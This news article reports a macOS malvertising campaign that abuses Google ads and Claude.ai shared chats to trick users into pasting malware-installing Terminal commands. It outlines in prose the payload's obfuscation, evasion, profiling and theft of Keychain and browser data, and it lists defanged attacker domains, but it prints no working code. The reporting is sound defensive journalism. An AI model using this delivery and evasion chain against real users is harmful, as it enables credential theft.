Google ads and Claude.ai chats used to spread Mac malware

Attackers are now weaponizing Google Ads and Claude.ai shared chats in a sophisticated malvertising campaign that targets users searching for a Mac download of Claude. The scheme lures victims with a sponsored search result that appears to link directly to the legitimate claude.ai site but instead serves up step-by-step instructions that install malware on their machine.

Security researcher Berk Albayrak of Trendyol Group first flagged the activity on LinkedIn. He uncovered a Claude.ai shared chat disguised as an official “Claude Code on Mac” installation guide, attributed to “Apple Support.” The chat directs users to open Terminal and paste a command that silently downloads and executes malware. BleepingComputer later confirmed a second shared chat using a different domain and payload but following the same social engineering blueprint. Both chats remained publicly accessible at the time of analysis.

The malicious instructions rely on Base64-encoded shell scripts hosted on domains such as customroofingcontractors[.]com and bernasibutuwqu2[.]com. The second variant serves a compressed ‘loader.sh’ that runs entirely in memory, leaving minimal forensic traces on disk. BleepingComputer observed that the server delivered a uniquely obfuscated version of the payload on each request, a technique known as polymorphic delivery, which evades signature-based detection.

In the variant BleepingComputer examined, the script first checks whether the victim’s machine uses Russian or CIS-region keyboard layouts. If so, it exits silently and sends a “cis_blocked” status ping to the attacker. Only machines that pass this geographic check proceed to the next stage. The script then collects the victim’s external IP address, hostname, OS version, and keyboard locale before pulling a second-stage payload and executing it through osascript, macOS’s built-in scripting engine. This grants remote code execution without dropping a traditional binary.

Albayrak’s variant skips the profiling step entirely. It goes straight to harvesting browser credentials, cookies, and macOS Keychain contents, then exfiltrates them as a variant of the MacSync infostealer. The domain briskinternet[.]com used in that variant appeared offline at the time of writing.

What makes this campaign particularly dangerous is that the destination URL in the ad is genuine. Both Google ads point to Anthropic’s real claude.ai domain because the attackers host their malicious instructions inside Claude’s own shared chat feature. There is no fake domain to spot, a twist on traditional malvertising that relies on lookalike phishing sites.

This is not the first time AI platform shared chats have been abused. In December, BleepingComputer reported a similar campaign targeting ChatGPT and Grok users. Earlier this year, threat actors ran an identical campaign aimed at macOS developers searching for Homebrew. Targeting Claude, however, casts a much wider net, reaching non-technical users who may be curious about AI and less likely to scrutinize a terminal command before running it.

To stay safe, users should navigate directly to claude.ai for downloading the native Claude app rather than clicking sponsored search results. The legitimate Claude Code CLI is available through Anthropic’s official documentation and does not require pasting commands from a chat interface. As a general rule, treat any instructions asking you to paste terminal commands with caution, regardless of where they appear to come from.

BleepingComputer reached out to Anthropic and Google for comment prior to publishing.